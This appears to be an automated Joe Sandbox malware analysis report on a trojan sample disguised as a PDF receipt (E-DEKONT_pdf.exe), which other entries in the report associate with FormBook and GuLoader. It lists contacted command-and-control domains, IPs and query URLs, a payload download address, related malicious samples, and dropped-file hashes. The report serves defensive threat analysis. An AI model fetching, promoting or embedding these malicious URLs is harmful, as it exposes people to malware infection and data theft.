http://www.dinero.news/mi94/?uZgtA=RrYIP0/eJgYl3SedIjrrJhoixcqEaFywGW8DIhJA710ua/O2pKo7Jyh/i2knDDaGCnub&YtxdA=ClrLPvDXABoDT8	0%	Avira URL Cloud	safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	0%	Avira URL Cloud	safe
http://www.bestpetfinds.com/mi94/?uZgtA=mO3gULgzVK9RKFx+HvnjTN/7ulsiA608FnchGSf2u+Dat8/14sLz5+BvjwL16EDGrJ0d&G6GdR=axl0	0%	Avira URL Cloud	safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	0%	Avira URL Cloud	safe
http://www.goodlifeprojectofficial.com/mi94/?uZgtA=Omatd+gu8nRqk8Gn1x/OOoOdl/68z9YaBlXV3mZwE7pdVLuvsR/X9VlgKTB3ZiBvgeg4&G6GdR=axl0	0%	Avira URL Cloud	safe
https://mozilla.org0	0%	Avira URL Cloud	safe
www.crosswalkconsulting.co.uk/mi94/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
td-ccm-168-233.wixdns.net	34.117.168.233	true	true	0%, Virustotal, Browse	unknown
www.peterslawonline.com	23.27.72.143	true	true		unknown
parkingpage.namecheap.com	198.54.117.212	true	false		high
bizformspro.com	34.102.136.180	true	false		unknown
www.bestpetfinds.com	112.196.98.174	true	true		unknown
www.emiu6696.com	202.95.14.233	true	true		unknown
couragetokingdom.com	122.201.64.145	true	true		unknown
www.licensescape.com	3.64.163.50	true	true		unknown
www.anjin98.com	160.121.87.199	true	true		unknown
www.credit-cards-54889.com	185.53.179.91	true	true		unknown
www.dinero.news	64.190.63.111	true	true		unknown
ext-sq.squarespace.com	198.185.159.144	true	false		high
ghs.googlehosted.com	142.250.181.243	true	false		unknown
funtime28.online	195.179.237.158	true	true		unknown
www.edelman-production.com	unknown	unknown	true		unknown
www.couragetokingdom.com	unknown	unknown	true		unknown
www.leqidt.tax	unknown	unknown	true		unknown
www.bril-kre-l25.buzz	unknown	unknown	true		unknown
www.anotherworldrecord.com	unknown	unknown	true		unknown
www.kevinjasperinc.africa	unknown	unknown	true		unknown
www.bizformspro.com	unknown	unknown	true		unknown
www.funtime28.online	unknown	unknown	true		unknown
www.lapalmaaccesible.com	unknown	unknown	true		unknown
www.goodlifeprojectofficial.com	unknown	unknown	true		unknown
www.crosswalkconsulting.co.uk	unknown	unknown	true		unknown
www.tmcgroup.africa	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.licensescape.com/mi94/?uZgtA=DdTnYTdsvxFdVgqd/vVQw4Ms7Aw/OPz+4Pu9rQ+4bXN8JsUKt08leuavRNawr2d0j4jE&YtxdA=ClrLPvDXABoDT8	true	Avira URL Cloud: safe	unknown
http://www.anotherworldrecord.com/mi94/?uZgtA=yKcY3jotfSPLyB/ftSMp74iudURdb3SAsX12brKJ4aUNBvL8L7J7V3FDmQx4l6kHWp2H&G6GdR=axl0	true	Avira URL Cloud: malware	unknown
http://www.crosswalkconsulting.co.uk/mi94/?uZgtA=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&G6GdR=axl0	true	Avira URL Cloud: safe	unknown
http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin	true	Avira URL Cloud: malware	unknown
http://www.bizformspro.com/mi94/?uZgtA=wd6Ye7WFDj3kGWmVOBmu3CHl8Eb+rC+I8gKa3GPCKACefvwcZ2db37gmqz26Fz2MH3/e&G6GdR=axl0	false	Avira URL Cloud: safe	unknown
http://www.credit-cards-54889.com/mi94/?YtxdA=ClrLPvDXABoDT8&uZgtA=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m	true	Avira URL Cloud: safe	unknown
http://www.edelman-production.com/mi94/?uZgtA=ORIqx8IF1+X+2hN52P87hXte5s/HoBMDp1q1F2AtNmI3dmVw+3KXXOfhBFQ6DTUSnU2z&G6GdR=axl0	false	Avira URL Cloud: safe	unknown
http://www.peterslawonline.com/mi94/?uZgtA=sfgefL3EX7tLrVmbrrvt2gRLjrdY9EgZIzRUFJ3eu0i+5BdWwZEHyNY8KODjs8HGUQbA&G6GdR=axl0	true	Avira URL Cloud: safe	unknown
http://www.anjin98.com/mi94/?uZgtA=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX&G6GdR=axl0	true	Avira URL Cloud: safe	unknown
http://www.lapalmaaccesible.com/mi94/?uZgtA=4Tl7mkmR2hfQ9KBizErbd2os7QrtMSS1Xe9D2XLoGouUMWTPUZ0bimWLWeFNR5N6++45&G6GdR=axl0	true	Avira URL Cloud: safe	unknown
http://www.funtime28.online/mi94/?uZgtA=zH93CAcCrit8Ot+ZBqn/vyMyC45co0bQrrnuYMPQl4K63vhoNC/Ny1DoALksFDMvrnCN&G6GdR=axl0	true	Avira URL Cloud: safe	unknown
http://www.couragetokingdom.com/mi94/?uZgtA=n+xM7LV5reGXDvbBpS71QDTdFlxot1/H++BJiUiW2QOMgqsfv+9mucFei6E+3dV5Q0+2&G6GdR=axl0	true	Avira URL Cloud: safe	unknown
http://www.emiu6696.com/mi94/?YtxdA=ClrLPvDXABoDT8&uZgtA=9d/LjZG6HsJ3NNhq1rA+PmL3FctD92E4WX5AE58IVInBpcqC/aiyhlqcUifd684qA43E	true	Avira URL Cloud: safe	unknown
http://www.dinero.news/mi94/?uZgtA=RrYIP0/eJgYl3SedIjrrJhoixcqEaFywGW8DIhJA710ua/O2pKo7Jyh/i2knDDaGCnub&YtxdA=ClrLPvDXABoDT8	true	Avira URL Cloud: safe	unknown
http://www.bestpetfinds.com/mi94/?uZgtA=mO3gULgzVK9RKFx+HvnjTN/7ulsiA608FnchGSf2u+Dat8/14sLz5+BvjwL16EDGrJ0d&G6GdR=axl0	true	Avira URL Cloud: safe	unknown
http://www.goodlifeprojectofficial.com/mi94/?uZgtA=Omatd+gu8nRqk8Gn1x/OOoOdl/68z9YaBlXV3mZwE7pdVLuvsR/X9VlgKTB3ZiBvgeg4&G6GdR=axl0	true	Avira URL Cloud: safe	unknown
www.crosswalkconsulting.co.uk/mi94/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.	E-DEKONT_pdf.exe, 00000001.00000001.2981717807.0000000000649000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	E-DEKONT_pdf.exe, 00000000.00000000.2513224221.000000000040A000.00000008.00000001.01000000.00000003.sdmp, E-DEKONT_pdf.exe, 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmp, E-DEKONT_pdf.exe, 00000001.00000000.2980628147.000000000040A000.00000008.00000001.01000000.00000003.sdmp	false		high
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD	E-DEKONT_pdf.exe, 00000001.00000001.2981717807.0000000000626000.00000020.00000001.01000000.00000006.sdmp	false		high
http://www.gopher.ftp://ftp.	E-DEKONT_pdf.exe, 00000001.00000001.2981717807.0000000000649000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	E-DEKONT_pdf.exe, 00000001.00000001.2981717807.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	E-DEKONT_pdf.exe, E-DEKONT_pdf.exe, 00000000.00000000.2513224221.000000000040A000.00000008.00000001.01000000.00000003.sdmp, E-DEKONT_pdf.exe, 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmp, E-DEKONT_pdf.exe, 00000001.00000000.2980628147.000000000040A000.00000008.00000001.01000000.00000003.sdmp	false		high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	E-DEKONT_pdf.exe, 00000001.00000001.2981717807.0000000000649000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	E-DEKONT_pdf.exe, 00000001.00000001.2981717807.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
https://mozilla.org0	E-DEKONT_pdf.exe, 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.53.179.91	www.credit-cards-54889.com	Germany	61969	TEAMINTERNET-ASDE	true
122.201.64.145	couragetokingdom.com	Australia	38719	DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	true
195.179.237.158	funtime28.online	Germany	6659	NEXINTO-DE	true
34.117.168.233	td-ccm-168-233.wixdns.net	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	true
3.64.163.50	www.licensescape.com	United States	16509	AMAZON-02US	true
64.190.63.111	www.dinero.news	United States	11696	NBS11696US	true
160.121.87.199	www.anjin98.com	South Africa	137951	CLAYERLIMITED-AS-APClayerLimitedHK	true
142.250.181.243	ghs.googlehosted.com	United States	15169	GOOGLEUS	false
112.196.98.174	www.bestpetfinds.com	India	17917	QTLTELECOM-AS-APQuadrantTeleventuresLimitedIN	true
202.95.14.233	www.emiu6696.com	Singapore	64050	BCPL-SGBGPNETGlobalASNSG	true
198.185.159.144	ext-sq.squarespace.com	United States	53831	SQUARESPACEUS	false
23.27.72.143	www.peterslawonline.com	United States	18779	EGIHOSTINGUS	true
34.102.136.180	bizformspro.com	United States	15169	GOOGLEUS	false
198.54.117.212	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false
34.138.169.8	unknown	United States	2686	ATGS-MMD-ASUS	true
198.54.117.215	unknown	United States	22612	NAMECHEAP-NETUS	true

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	835522
Start date and time:	2023-03-27 14:02:09 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 17m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	E-DEKONT_pdf.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/19@25/16
EGA Information:	Successful, ratio: 75%
HDC Information:	Successful, ratio: 21.1% (good quality ratio 20.3%) Quality average: 77% Quality standard deviation: 25.4%
HCA Information:	Successful, ratio: 81% Number of executed functions: 88 Number of non-executed functions: 249
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe
Excluded IPs from analysis (whitelisted): 40.126.32.140, 20.190.160.20, 20.190.160.22, 20.190.160.14, 40.126.32.72, 40.126.32.134, 40.126.32.74, 40.126.32.68, 8.248.147.254, 67.27.234.126, 67.27.235.126, 8.253.95.121, 8.248.137.254, 20.82.207.122
Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, client.wns.windows.com, fg.download.windowsupdate.com.c.footprint.net, slscr.update.microsoft.com, www.tm.v6.a.prd.aadg.trafficmanager.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wd-prod-cp.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, prdv6a.aadg.msidentity.com, wdcpalt.microsoft.com, login.live.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.53.179.91	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.credit-cards-54889.com/mi94/?w88pk=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&Sr94=9rXXvvGp
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.credit-cards-54889.com/mi94/?C2JhjJw=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&DDKH4=7ndL1VtpC
	SKM_CE_06032023.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.business-analytics-98074.com/ln19/?f8yD3fcp=Cd9HMUOQFdGvrbObYyJeppHWq42yRRvsY4C1LD1028nEhBvHjP2HD2BkskoprsPdI1g5&3fhH=G2MDa68xrHWpoxO0
	IaZj04IBl4.exe	Get hash	malicious	FormBook	Browse	www.lab-grown-diamonds-41565.com/pe63/?5je0b=1kcBqgKuhW1GC+4GL86vBxW4LgCWjCHz0fTuvIATFugA7q7Lou1Dp24p2ipx68+vJUvchZNjuQ==&m0DLR=-Z94LdrHbfsXy81
	BJO4MdCuuI.exe	Get hash	malicious	FormBook	Browse	www.lab-grown-diamonds-41565.com/pe63/?Ql=FlQTIzmh&C2Mph=1kcBqgKuhW1GC+4GL86vBxW4LgCWjCHz0fTuvIATFugA7q7Lou1Dp24p2ilI2dSveSzN
	e-dekont.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.dental-implants-51504.com/gg58/?w2=f+qAVkrpQhCd+fRtLWhh8tPPcQuX4UHkUsotdvtoZ6hNEQbVXq4GUhAx34YnXzQjerMx&02=t0GXqDfH
	Velv.vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.computercodingclasses.com/roz2/?ftTl=9rwdypNX6rv4-&y4G8q0I=iaSseVL5IyoWX3R+Xo29tGp7VCznpYC1Tq8D2Ys/48hV84ZDNBxlTw9zfVwFIBX1L040
	zH4aQ6xq4y.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.adhd-treatment-15476.com/kiz0/?yXb=tOhRZnSrT+PouMi/oaBDfs1Vxohc8Iwo5Nyd+WOzzFrznyfI7BpJ39a2zsbu83Ir9xVdw56eYATP9UqvYfju8fpechlMoPRzUw==&7nWp=lTflE2MXJvwlQrEP
	IMG-20022891.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.adhd-treatment-15476.com/kiz0/?K0G45zjP=tOhRZnSrT+PouMi/oaBDfs1Vxohc8Iwo5Nyd+WOzzFrznyfI7BpJ39a2zsbu83Ir9xVdw56eYATP9UqvYfju8fpechlMoPRzUw==&w0GPYn=o6AhrTX8S
	PO202202AG7.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.adhd-treatment-15476.com/kiz0/?oPSXj=2dtDM&-Zv=tOhRZnSrT+PouMi/oaBDfs1Vxohc8Iwo5Nyd+WOzzFrznyfI7BpJ39a2zsbu83Ir9xVdw56eYATP9UqvYfju8fpechlMoPRzUw==
	Quote.js	Get hash	malicious	FormBook, VjW0rm	Browse	www.computercodingclasses.com/t65q/?bT=lupTryXInl8H2EmCyLorVVhHVWPSKiLM9UzkD5xf6uxo3aaRqo6aAhjTSsJ/HbTkPoqi&5jtl9=6l98bLZ0QJw0bzlP
	Order confirmation 5679021.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.badewannekaufdeu.com/he8c/?EFN8=0FNDbfl&kHwX=gFiUwqcwaG6z10IjuYIdKgIRtZFjdBH+2QkeuAYyrVUjJ6uLvHj9q+/PmgW3+TvG9nRv
	Urgentn#U00a1 objedn#U00a0vka.pdf.exe	Get hash	malicious	FormBook	Browse	www.cardealsherein.com/d2g7/?5jrL=j0DtnBrpddlTAX&3fWd=+8MO9WAG5+McQhP+VhlFFEQEPMWTJ5N6QzTEwZ/atM/bwddb/8VfphxRCVksYneVVcAA
	REQUEST FOR QOUTATION.exe	Get hash	malicious	FormBook	Browse	www.brasalesoffersus.com/s0w6/?GB8h=CzcZFRQpdVHr1P6b67V9qs6oBP40Cegbylso0gmODKf1pluFbMKTyeNVMkwMTOKYCz/8Uehfqw==&BRVDlP=1bgXIBi0
	HSBCPA#U007e1.exe	Get hash	malicious	FormBook GuLoader	Browse	www.botoxsurgeryagencyuk.com/a18a/?3fOHFT=EPLZE+OkfFcH+m9IjrVY9e5eaFwQ3HPN6tvINvZaVsMpg+rthY2QZs67ANSm48KlDmtL&5j=o67xKrnxddhPL
	PI02627625141.PDF.exe	Get hash	malicious	FormBook	Browse	www.segurofunerarioar.com/euv4/?ZN6=4xY+9kof0fJA/xQyc1iHSQSqSpiHZkZhS7PNYyY1M5Me24BgrLRzisiIvUtnVlbPNjyT&2dWDGz=7nL0
	Nuevo Pedido.exe	Get hash	malicious	FormBook	Browse	www.onlinedatingthaiweb.com/udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
td-ccm-168-233.wixdns.net	EEcbDKtUD5MqK0g.exe	Get hash	malicious	FormBook	Browse	34.117.168.233
	load_4.bin.exe	Get hash	malicious	FormBook	Browse	34.117.168.233
	INVENT_LIST.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.117.168.233
	yoioUlSxTs.exe	Get hash	malicious	FormBook	Browse	34.117.168.233
	TR_ORDER.EXE.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.117.168.233
	customer's Scan-Copy.exe	Get hash	malicious	FormBook	Browse	34.117.168.233
	TRANSPOR.EXE.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.117.168.233
	Transport_Plan.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.117.168.233
	DHLINV002347.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.117.168.233
	QUOTATION.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.117.168.233
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.117.168.233
	DHLINV000156.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.117.168.233
	Hbi8WUpShm.exe	Get hash	malicious	FormBook	Browse	34.117.168.233
	DHLIN00178.exe	Get hash	malicious	FormBook, GuLoader	Browse	34.117.168.233
	BS_Orden_de_Pago_20230315-1000_0000015444552000_001888.exe	Get hash	malicious	FormBook	Browse	34.117.168.233
	#U00f6deme_formu_0001.exe	Get hash	malicious	FormBook	Browse	34.117.168.233
	prueba de transferencia de pago 20230315-1000_0000015444552_001888.bz2	Get hash	malicious	FormBook	Browse	34.117.168.233
	http://www.gerardosmarketplace.com	Get hash	malicious	Unknown	Browse	34.117.168.233
	3QsGFmVse3.exe	Get hash	malicious	FormBook	Browse	34.117.168.233
	CRD_NT_INV-2306020237.vbs	Get hash	malicious	FormBook	Browse	34.117.168.233
www.peterslawonline.com	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	23.27.72.143
www.peterslawonline.com	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	23.27.72.143

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	122.201.64.145
	http://go.onelink.me/107872968?pid=InProduct&c=Global_Internal_YGrowth_AndroidEmailSig__AndroidUsers&af_wl=ym&af_sub1=Internal&af_sub2=Global_YGrowth&af_sub3=EmailSignature&af_web_dp=http://Bctransit.roombank.co.uk/hh/ZXJpbm5fcGlua2VydG9uQGJjdHJhbnNpdC5jb20=	Get hash	malicious	Unknown	Browse	203.28.48.2
	Invoice#SILENTCODERSLIMAHURUF.htm	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	103.20.200.161
	Invoice#SILENTCODERSLIMAHURUF.htm	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	103.20.200.161
	Invoice#SILENTCODERSLIMAHURUF.htm	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	103.20.200.161
	Q5mRnbHQK2.exe	Get hash	malicious	SmokeLoader	Browse	116.0.23.217
	https://www.construct-csvendor.net/	Get hash	malicious	HTMLPhisher	Browse	116.0.20.231
	shipping_documents.exe	Get hash	malicious	AgentTesla	Browse	27.54.86.236
	8846_0.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	click.wsf	Get hash	malicious	Emotet	Browse	203.26.41.131
	z2H8jaZbYg.elf	Get hash	malicious	Mirai, Moobot	Browse	103.67.234.220
	https://www.starsmiles.com.au/	Get hash	malicious	Unknown	Browse	116.0.23.203
	Form - 16 Mar, 2023.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	https://midcoastsupplies.com.au	Get hash	malicious	Unknown	Browse	27.54.81.161
	https://midcoastsupplies.com.au	Get hash	malicious	Unknown	Browse	27.54.81.161
	#Ud83d#Udce7#U2122 Completed Signed Agreements.shtml	Get hash	malicious	HTMLPhisher	Browse	122.201.127.25
	MBQ24253060297767042_202303161424.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	iMedPub_LTD_4.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	iMedPub_LTD_6.one	Get hash	malicious	Emotet	Browse	203.26.41.131
	INNOVINC.one	Get hash	malicious	Emotet	Browse	203.26.41.131
TEAMINTERNET-ASDE	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.53.179.173
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.53.179.91
	Kf5gI5Ttry.exe	Get hash	malicious	FormBook	Browse	185.53.179.171
	customer's Scan-Copy.exe	Get hash	malicious	FormBook	Browse	185.53.179.170
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.53.179.174
	DHLINV000156.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.53.177.54
	DHLIN00178.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.53.177.54
	http://go.staticvisit.net	Get hash	malicious	Unknown	Browse	185.53.178.30
	#U00f6deme_formu_0001.exe	Get hash	malicious	FormBook	Browse	185.53.178.52
	rocee6632.exe	Get hash	malicious	FormBook	Browse	185.53.179.94
	REQUEST_FOR_QUOTE_FORM.exe	Get hash	malicious	FormBook	Browse	185.53.179.170
	http://321creditcards.com	Get hash	malicious	Unknown	Browse	185.53.178.30
	TRANSFI1990869320230401.vbs	Get hash	malicious	FormBook	Browse	185.53.179.92
	http://fgoogle.de	Get hash	malicious	Unknown	Browse	185.53.178.50
	INTHIST_230714122537.vbs	Get hash	malicious	FormBook	Browse	185.53.179.170
	SKM_CE_06032023.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.53.179.170
	z37OrdemdeComprapdf.exe	Get hash	malicious	FormBook	Browse	185.53.179.173
	https://loudsjack.com	Get hash	malicious	Unknown	Browse	185.53.179.30
	sat#U0131n alma emri pdf.exe	Get hash	malicious	FormBook	Browse	185.53.179.171
	SKMBT Ref Nr0012120064 28022023.exe	Get hash	malicious	FormBook, GuLoader	Browse	185.53.179.92

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll	E-dekont_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse
	E-dekont_pdf.exe	Get hash	malicious	GuLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	GuLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji.exe	Get hash	malicious	GuLoader	Browse
	Products_List.doc	Get hash	malicious	Unknown	Browse
	TEPO0015922.doc	Get hash	malicious	GuLoader	Browse
	Royalistic.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Royalistic.exe	Get hash	malicious	GuLoader	Browse
	Annexationist.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Annexationist.exe	Get hash	malicious	GuLoader	Browse
	file.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	file.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	file.exe	Get hash	malicious	GuLoader	Browse
	file.exe	Get hash	malicious	GuLoader	Browse
	file.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	file.exe	Get hash	malicious	GuLoader	Browse
	REQUEST_FOR_QUOTE.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	6.024446974480565
Encrypted:	false
SSDEEP:	192:Vm9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:QJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
MD5:	E23600029D1B09BDB1D422FB4E46F5A6
SHA1:	5D64A2F6A257A98A689A3DB9A087A0FD5F180096
SHA-256:	7342B73593B3AA1B15E3731BFB1AFD1961802A5C66343BAC9A2C737EE94F4E38
SHA-512:	C971F513142633CE0E6EC6A04C754A286DA8016563DAB368C3FAC83AEF81FA3E9DF1003C4B63D00A46351A9D18EAA7AE7645CAEF172E5E1D6E29123AB864E7AC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: E-dekont_pdf.exe, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse Filename: E-dekont_pdf.exe, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse Filename: Products_List.doc, Detection: malicious, Browse Filename: TEPO0015922.doc, Detection: malicious, Browse Filename: Royalistic.exe, Detection: malicious, Browse Filename: Royalistic.exe, Detection: malicious, Browse Filename: Annexationist.exe, Detection: malicious, Browse Filename: Annexationist.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: REQUEST_FOR_QUOTE.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./@t.k!..k!..k!..9T..l!.. Y..l!..k!..x!...T..o!...T..j!...T..j!...T..j!..Richk!..........................PE..L.....c.........."!....."...................@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...+!.......".................. ..`.rdata.......@.......&..............@..@.data...D....P.......*..............@....reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\DORME.ini

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	31
Entropy (8bit):	4.244518891032036
Encrypted:	false
SSDEEP:	3:UkE74OvrMXMAzovn:izMxEvn
MD5:	3000F7F0F12B7139EA28160C52098E25
SHA1:	9D032395F38D341881019B996E591160D542054B
SHA-256:	467B09FF26622746D205628AE325EC9838461BC5FE741B3757BB39DDEC87ECB1
SHA-512:	A76A2F1E3686E2FFD03388EC7DBCD4AFA6AE53CCD3AA40C6FBBF0C994EEE5E2685D0C412F15EC4506C1175F5A84712E1A8B7AE32E6A0327E1BA47321A59E0EE2
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[ManualPaths]..NumEntries=Hai..

C:\Users\user\procharity\Anasarca\Uncompelled\Amatrarkolog217.Taf

Download File

Process:	C:\Users\user\Desktop\E-DEKONT_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	288465
Entropy (8bit):	7.01115010710151
Encrypted:	false
SSDEEP:	6144:9iABbEtupDxMm9J92brmeSz+QtQovYjopQQXvY96:bIO2vmh2QYcnXw0
MD5:	67ED04C5935D9A57ACBA3D4EAC8A44E4
SHA1:	D9FD1AFDCBA79D086A5FF0DCCC6FB9B6C284ED1D
